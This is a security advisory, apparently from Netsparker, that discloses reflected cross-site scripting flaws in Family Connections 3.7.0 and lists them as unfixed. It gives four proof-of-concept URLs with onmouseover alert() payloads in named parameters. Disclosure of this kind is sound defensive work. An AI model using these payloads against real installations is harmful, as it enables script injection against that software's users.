Category: Vulnerabilities
Hits: 274
Multiple Cross-site Scripting Vulnerabilities in Family Connections 3.7.0


Advisory by Netsparker
Name: Multiple Reflected Cross-site Sc Multiple Cross-site Scripting Vulnerabilities in Family Connections 3.7.0


Advisory by Netsparker
Name: Multiple Reflected Cross-site Scripting Vulnerabilities in Family Connections
Affected Software: Family Connection
Affected Versions: 3.7.0
Vulnerability: Multiple Reflected XSS
Severity: High
Status: Not Fixed
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
Netsparker Advisory Reference: NS-18-040

Technical Details

URL: /familytree.php?delete=x" onmouseover=alert(0x011D92) x="
Parameter Name: delete
Parameter Type: GET
Attack Pattern: x" onmouseover=alert(0x011D92) x="

URL: /gallery/index.php?uid=x" onmouseover=alert(0x011D84) x="&cid=toprated
Parameter Name: uid
Parameter Type: GET
Attack Pattern: x" onmouseover=alert(0x011D84) x="

URL: /messageboard.php
Parameter Name: search
Parameter Type: POST
Attack Pattern: x" onmouseover=alert(0x011D74) x="

URL: /calendar.php?add=%27%22%20onmouseover%3dalert(0x0036BC)%20
Parameter Name: add
Parameter Type: GET
Attack Pattern: '" onmouseover=alert(0x0036BC)

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline

25th April 2018 - First Attempted Contact
3rd January 2019 - Advisory Released

Credits & Authors

These issues have been discovered by Zekvan Arslan while testing Netsparker Web Application Security Scanner.

About Netsparker

Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engineas unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website for more information.